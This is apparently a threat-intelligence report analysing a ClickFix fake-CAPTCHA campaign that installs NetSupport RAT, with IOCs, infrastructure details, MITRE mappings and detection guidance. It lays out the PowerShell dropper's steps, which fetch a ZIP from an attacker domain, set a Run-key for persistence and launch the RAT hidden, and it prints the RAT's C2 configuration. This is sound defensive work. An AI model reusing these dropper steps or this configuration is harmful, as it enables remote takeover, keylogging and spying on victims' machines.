Back to reports

NetSupport RAT v14.10: ClickFix Campaign Deploys Commodity RAT via Fake CAPTCHA Pages

Two Windows Server 2022 nodes named 'SMTP' on the same /24 subnet in Frankfurt, victim tracking IDs, and a domain registered just 48 hours before go-live

PublishedMarch 12, 2026
NetSupport RATClickFixFakeCaptchaRemote Access ToolInitial Access BrokerPowerShell Dropper

Overview

On March 12, 2026, Breakglass Intelligence analyzed a NetSupport RAT v14.10 deployment campaign using the ClickFix (also known as FakeCaptcha) delivery technique. A malicious MSI installer or PowerShell script delivered through a fake CAPTCHA page downloads a pre-packaged NetSupport RAT ZIP from applicationhost17.com, extracts it to %APPDATA%, and establishes persistence via a Run registry key. The RAT then beacons to a Windows Server 2022 C2 node at 172.94.9.4:443 using the standard NetSupport HTTP protocol.

The infrastructure tells a story of deliberate operational planning: two Windows servers sharing the hostname "SMTP" on the same /24 subnet (172.94.9.0/24) hosted at M247 Frankfurt, domain registration through Njalla (a privacy-first registrar), and per-victim tracking IDs to monitor install status. The download payload later migrated to Russian hosting (landvps.ru), pointing to an actor with established OPSEC practices and infrastructure-rotation awareness.

At time of analysis, the C2 was actively responding with HTTP 200 to beacon requests. The sample had 30/76 VirusTotal detections.

Sample Metadata

FieldValue
FilenameUPD-48C5A1C5-DDD4-465E-9C66-27EFC1D5A846.zip
SHA25636ad12ff7efbf323f58d7efd5977880419fc0452061f3ef2ca61cf73bb4bb5c1
MD58a14ae0c80b64114ad63a146e1b0871c
SHA10654b2098e8dd2c868d10ac6248fdf4cacebddd2
File TypeZIP archive
File Size2,243,453 bytes
VT Detections30/76
First Seen2026-03-12 17:13:41 UTC
ReporterJAMESWT_WT
Bundle Contents15 files (8 PE, 2 INI, 2 DLL, 1 LIC, 1 INF, 1 TXT)

The ClickFix Delivery Technique

ClickFix, active since mid-2024, is a social engineering technique that presents a fake browser or CAPTCHA error instructing users to manually paste a command into Win+R (Run dialog) or the browser address bar. This campaign's specific flow:

  1. Victim visits a page at https://applicationhost17.com/captcha.php?vid=<CAMPAIGN_ID>
  2. The fake CAPTCHA instructs the user to execute a command
  3. A PowerShell dropper runs with -NoProfile -ExecutionPolicy bypass
  4. The dropper downloads the NetSupport RAT ZIP, extracts it, sets persistence, and launches the RAT
  5. Tracking callbacks to track.php record when installation starts and completes

An MSI installer variant (5bfbe9.msi / bad.msi, SHA256: 78a511e1...) also exists, dropping PowerShell scripts to temp before fetching the main payload. The MSI publisher is left as "Your Company" -- a generic placeholder that reveals uncustomized tooling and a notable OPSEC failure.

The PowerShell Dropper Template

All observed PowerShell droppers follow an identical template with randomized variable names:

  1. Track start: GET https://applicationhost17.com/track.php?vid=<VID>&action=started
  2. Create install directory: %APPDATA%\<GUID_DIR>\ (e.g., TM-EA9F5A76-DE30-4BDF-9308-E1F4DF3B2569)
  3. Download RAT ZIP: IWR https://applicationhost17.com/downloads/<UUID>.zip
  4. Extract and clean up: Expand-Archive then delete ZIP
  5. Set persistence: HKCU\...\Run\SystemUpdate_<VID> pointing to client32.exe
  6. Launch RAT: Start-Process -WindowStyle Hidden
  7. Track completion: GET https://applicationhost17.com/track.php?vid=<VID>&action=completed

Observed Campaign Variants

VIDInstallation DirectoryNotes
jOTlMUPQTM-EA9F5A76-* / MW-3BE3C31C-*Two directories, same VID
mMVTJvisTM-07F72CBE-*Separate tracking ID
69b1c805806efSY-02B0EC74-*Longer hex-like VID
6566676869707172UPD-E9550778-*Decodes to efghijpr -- sequential ASCII test values

The last VID decoding to sequential ASCII characters strongly suggests the actor was testing the infrastructure with incremental values, and these test runs leaked into the wild.

NetSupport RAT: The Payload

client32.exe

FieldValue
VersionV14.10
Compiled2023-12-05
ProductNetSupport Remote Control
CompanyNetSupport Ltd
IMPHASHa9d50692e95b79723f3e76fcf70d023e

NetSupport Manager v14.10 is a legitimate remote administration tool being repurposed as an unauthorized RAT. The bundle includes:

  • client32.exe: Main RAT client
  • PCICL32.DLL: Primary networking DLL (3.7MB, 22/76 VT)
  • remcmdstub.exe: Remote command execution / shell access
  • nskbfltr.inf: Kernel keyboard filter for keylogging
  • NSM.LIC: Forged license file (detected as BackDoor.RMS.153 by DrWeb)
  • HTCTL32.DLL: Audio/webcam capture capabilities

C2 Configuration (Client32.ini)

[CLIENT]
GatewayAddress=172.94.9.4
GSK=1                        ; Gateway SecureKey enabled
PORT=443
[CONTROL]
SilentInstall=1

RAT Capabilities

Once installed, the operator has full control of the victim machine:

  • Full desktop viewing and control
  • Remote shell (cmd/PowerShell via remcmdstub.exe)
  • File manager with upload/download
  • Keyboard/mouse injection
  • Keylogging (kernel filter driver)
  • Screen capture and recording
  • Audio and webcam capture
  • Process management

C2 Infrastructure: The "SMTP" Twins

C2 Server: 172.94.9.4

FieldValue
HostnameSMTP (NetBIOS)
OSWindows Server 2022
ASNAS9009 / AS213790 (M247 Europe SRL)
LocationFrankfurt am Main, Germany
Open Ports135 (MSRPC), 443 (C2), 445 (SMB v2), 5357 (HTTPAPI)
VT Malicious3/90

Port 443 runs plain HTTP tunneled over the port (not actual HTTPS) -- the NetSupport protocol uses HTTP POST to /fakeurl.htm with User-Agent NetSupport Manager/1.3. SMB and MSRPC being exposed indicates the attacker has not hardened the server.

Download/Tracking Server: 172.94.9.24

FieldValue
HostnameSMTP (same naming convention)
OSWindows Server 2022
ASNAS9009 / AS213790 (same infrastructure)
LocationFrankfurt am Main, Germany
Open Ports3389 (RDP), 5357 (HTTPAPI)

Port 3389 (RDP) with a valid TLS certificate CN=smtp is the attacker's management interface. Both servers share the same hostname "SMTP" and sit on the same /24 subnet -- a clear infrastructure reuse fingerprint.

Current Download Server: 77.105.133.95

FieldValue
Hostnames163115.landvps.online, 152253.landvps.online
OSDebian 11
ASNAS216334 (New Hosting Technologies LLC)
LocationMoscow, Russia
ServerApache/2.4.66

The DNS for applicationhost17.com migrated from 172.94.9.24 to 77.105.133.95 between March 11 and March 12 -- the actor rotated the download server to Russian hosting while keeping the C2 node fixed in Frankfurt. The 600-second DNS TTL indicates active infrastructure management.

Download Domain: applicationhost17.com

FieldValue
Registered2026-03-10T13:54:11Z (48 hours before campaign)
RegistrarTucows (via Njalla privacy service)
Nameservers1-YOU.NJALLA.NO, 2-CAN.NJALLA.IN, 3-GET.NJALLA.FO
RegistrantHashed/obfuscated (1f8f4166599d23ee)
Current A Record77.105.133.95
Previous A Record172.94.9.24 (sandbox era)
VT Malicious11/94
DNS TTL600 seconds

The registrant fields contain truncated SHA256/HMAC hashes -- Njalla's standard obfuscation of real registrant data. No usable attribution from WHOIS.

C2 Communication Protocol

URLMethodUser-AgentResponse
http://172.94.9.4/fakeurl.htmPOSTNetSupport Manager/1.3200 OK
http://172.94.9.4:443/fakeurl.htmPOSTNetSupport Manager/1.3200 OK
http://geo.netsupportsoftware.com/location/loca.aspGETNetSupport default404
https://applicationhost17.com/track.php?vid=<VID>&action=startedGETPowerShell UA500
https://applicationhost17.com/track.php?vid=<VID>&action=completedGETPowerShell UA500

The geolocation beacon to geo.netsupportsoftware.com is a legitimate NetSupport feature -- its presence confirms the client is genuine NetSupport Manager software repurposed as a RAT.

Campaign Timeline

DateEvent
2023-12-05client32.exe compilation date
2026-03-07 22:38:12ZIP bundle files timestamp
2026-03-10 13:54:11applicationhost17.com registered via Njalla
2026-03-11MSI and PS1 droppers first observed in sandboxes
2026-03-12 17:13:41Primary ZIP submitted to VT by JAMESWT_WT
2026-03-12DNS updated: 172.94.9.24 migrated to 77.105.133.95

The tight timeline -- domain registration to active campaign in 48 hours -- indicates a rapid-deployment operational tempo. The bundle files were timestamped March 7, suggesting the actor prepared the payload 3 days before registering the delivery domain.

Attribution Assessment

Confidence: MEDIUM

The actor uses ClickFix delivery (widely adopted since 2024), deploys commodity NetSupport RAT (low barrier, widely available), registers through Njalla (privacy-first registrar popular with Russian-nexus actors), and hosts infrastructure on M247 (low-KYC hoster) and Russian landvps.ru. The machine naming convention "SMTP" suggests deliberate misdirection -- making the servers appear as mail infrastructure in network logs.

The per-victim VID tracking system suggests a commercial/MaaS operation rather than a lone actor.

OPSEC Failures

  1. MSI publisher "Your Company": Generic placeholder reveals uncustomized tooling
  2. Shared hostname and subnet: Both C2 servers named "SMTP" on the same /24 -- infrastructure fingerprint
  3. 48-hour domain staging: Minimal time between registration and campaign activation
  4. Test VID in the wild: 6566676869707172 decoding to sequential ASCII suggests development/testing runs submitted to sandboxes
  5. RDP exposed: Port 3389 open on the download server -- actor management interface visible to internet scanners

MITRE ATT&CK TTPs

IDTechniqueDetail
T1566PhishingClickFix fake CAPTCHA lure
T1204.002User Execution: Malicious FileUser executes MSI or pastes PowerShell
T1059.001PowerShellDropper with -ExecutionPolicy bypass
T1105Ingress Tool TransferZIP downloaded via Invoke-WebRequest
T1547.001Registry Run KeysHKCU\...\Run\SystemUpdate_<VID>
T1036Masquerading"software.zip", GUID directory names
T1219Remote Access SoftwareNetSupport Manager v14.10 as unauthorized RAT
T1071.001Application Layer Protocol: WebHTTP POST /fakeurl.htm
T1095Non-Application Layer ProtocolNetSupport binary protocol over TCP 443
T1112Modify RegistrySets Run key for persistence
T1113Screen CaptureNetSupport screen view capability
T1056.001Input Capture: Keyloggingnskbfltr.inf kernel keyboard filter
T1021.001Remote Services: RDPActor RDPs to 172.94.9.24 for management

IOC Tables

File Hashes

SHA256NameType
36ad12ff7efbf323f58d7efd5977880419fc0452061f3ef2ca61cf73bb4bb5c1UPD-48C5A1C5-*.zipPrimary ZIP bundle
78a511e1da802149564639d4c3b66f67faee4bb6d762ffae43250757092172755bfbe9.msi / bad.msiMSI dropper
06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268client32.exeNetSupport RAT v14.10
63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8PCICL32.DLLNetSupport networking DLL
6558b3307215c4b73fc96dc552213427fb9b28c0cb282fe6c38324f1e68e87d6remcmdstub.exeRemote shell stub
ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54NSM.LICForged license file
fcacfab09fe00dc26c86172fdc7482efb196e6cf725bef4d141d28dff4638619Client32.iniC2 configuration
d96856cd944a9f1587907cacef974c0248b7f4210f1689c1e6bcac5fed289368nskbfltr.infKeyboard filter INF
4343b537e338771434045022a4961a84ba42cdecd7e98f48087a4213d20b3f59dropper.ps1 (jOTlMUPQ)PowerShell dropper
876d5fdf5addc3f5e2987e841954248a4d15d9ecaca74ef317d76459f2cb3f13dropper.ps1 (jOTlMUPQ)PowerShell dropper
43ac17b48413c7c1545a8ce6f0b2219c3dd2a3289546c6886affbff9bfd15094dropper.ps1 (mMVTJvis)PowerShell dropper
e2edb63c46dd8cf41c541ae45accfce66e41dc4ddcbef61ee3ea9dc9d8d7a588dropper.ps1 (test VID)PowerShell dropper

Network Indicators

IndicatorTypeRole
172.94.9.4IPv4NetSupport C2
172.94.9.24IPv4Download server / RDP management
77.105.133.95IPv4Current download/tracking server
applicationhost17.comDomainDownload + tracking panel
http://172.94.9.4/fakeurl.htmURLNetSupport C2 beacon
http://172.94.9.4:443/fakeurl.htmURLNetSupport C2 beacon (alt port)
https://applicationhost17.com/captcha.phpURLClickFix lure / PS1 delivery
https://applicationhost17.com/track.phpURLVictim tracking
https://applicationhost17.com/downloads/URLRAT payload staging
NetSupport Manager/1.3User-AgentC2 traffic fingerprint

Registry Indicators

KeyValuePurpose
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdate_<VID>"%APPDATA%\<GUID>\client32.exe"Persistence

File System Indicators

PathDescription
%APPDATA%\TM-EA9F5A76-DE30-4BDF-9308-E1F4DF3B2569\RAT install dir
%APPDATA%\TM-07F72CBE-931E-4389-BEC0-21326A8A70C4\RAT install dir
%APPDATA%\MW-3BE3C31C-505C-43FD-9BBF-7E505ABA8D85\RAT install dir
%APPDATA%\SY-02B0EC74-4AE2-4686-96D2-CD15498FCFDF\RAT install dir
%APPDATA%\UPD-E9550778-2701-42F4-9FFD-36119FABE805\RAT install dir
%APPDATA%\<GUID>\client32.exeNetSupport RAT binary

Detection Guidance

Behavioral Indicators

  • powershell.exe with -ExecutionPolicy bypass downloading from newly registered domains
  • client32.exe running from %APPDATA%\<UUID>\ (outside Program Files)
  • DNS query to geo.netsupportsoftware.com from non-browser processes
  • HTTP POST to /fakeurl.htm with User-Agent NetSupport Manager/1.3
  • Run key name with SystemUpdate_ prefix
  • MSI Publisher = "Your Company"

Network Signatures

  • Block traffic to 172.94.9.4, 172.94.9.24, and 77.105.133.95
  • Block DNS resolution of applicationhost17.com
  • Alert on HTTP POST requests to /fakeurl.htm from internal hosts
  • Alert on User-Agent string NetSupport Manager/1.3 from non-IT-approved systems

Analysis by GHOST -- Breakglass Intelligence

Share